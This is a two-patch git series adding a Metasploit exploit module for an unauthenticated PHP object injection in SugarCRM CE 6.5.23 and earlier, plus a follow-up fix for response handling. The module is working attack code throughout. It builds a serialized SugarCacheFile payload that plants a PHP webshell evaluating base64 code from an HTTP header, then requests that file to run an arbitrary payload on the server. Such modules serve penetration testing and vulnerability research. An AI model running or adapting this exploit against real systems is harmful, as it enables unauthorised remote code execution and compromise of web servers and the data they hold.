From df5fdbff41a0e9464eddcb8b4172cf49fa21e40f Mon Sep 17 00:00:00 2001
From: EgiX <n0b0d13s@gmail.com>
Date: Wed, 7 Sep 2016 01:58:41 +0200
Subject: [PATCH 1/2] Add module for KIS-2016-07: SugarCRM REST PHP Object
 Injection

This PR contains a module to exploit KIS-2016-07, a PHP Object Injection vulnerability in SugarCRM CE before version 6.5.24 that allows unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. Successful exploitation of this vulnerability should require SugarCRM to be running on PHP before version 5.6.25 or 7.0.10, which fix CVE-2016-7124.
---
 .../webapp/sugarcrm_rest_unserialize_exec.rb  | 89 +++++++++++++++++++
 1 file changed, 89 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb

diff --git a/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb
new file mode 100644
index 0000000000..529b6149ff
--- /dev/null
+++ b/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'SugarCRM REST Unserialize PHP Code Execution',
+      'Description'    => %q{
+        This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
+        which could be abused to allow unauthenticated users to execute arbitrary PHP code with
+        the permissions of the webserver. The dangerous unserialize() call exists in the
+        '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
+        method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
+      },
+      'Author'         => 'EgiX',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://karmainsecurity.com/KIS-2016-07'],
+          ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
+          ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
+          ['URL', 'https://bugs.php.net/bug.php?id=72663']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['SugarCRM CE <= 6.5.23', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 23 2016'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
+        ], self.class)
+  end
+
+  def exploit
+    upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
+
+    payload_serialized =  "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
+    payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
+    payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
+    payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
+
+    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
+
+    res = send_request_cgi(
+    {
+      'uri'    => normalize_uri(target_uri.path, 'service/v4/rest.php'),
+      'method' => 'POST',
+        'vars_post' => {
+          'method'     => 'login',
+          'input_type' => 'Serialize',
+          'rest_data'  => payload_serialized
+        }
+    })
+
+    if not res or res.code != 200
+      print_error("#{peer} - Exploit failed: #{res.code}")
+      return
+    end
+
+    register_files_for_cleanup(File.basename(upload_php))
+
+    print_status("#{peer} - Executing the payload #{upload_php}")
+
+    res = send_request_cgi(
+    {
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, upload_php),
+      'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
+    })
+
+    if res and res.code != 200
+      print_error("#{peer} - Payload execution failed: #{res.code}")
+      return
+    end
+  end
+end

From a0095ad809a3b41a1e74698a01923c4d2069f2fc Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 13 Sep 2016 15:45:57 -0500
Subject: [PATCH 2/2] Check res properly and update Ruby syntax

If res is nil, it should not be doing res.code
---
 .../unix/webapp/sugarcrm_rest_unserialize_exec.rb        | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb
index 529b6149ff..501c736e80 100644
--- a/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb
@@ -65,7 +65,12 @@ class MetasploitModule < Msf::Exploit::Remote
         }
     })
 
-    if not res or res.code != 200
+    unless res
+      print_error('Connection timed out while sending a request to rest.php')
+      return
+    end
+
+    if res && res.code != 200
       print_error("#{peer} - Exploit failed: #{res.code}")
       return
     end
@@ -81,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
     })
 
-    if res and res.code != 200
+    if res && res.code != 200
       print_error("#{peer} - Payload execution failed: #{res.code}")
       return
     end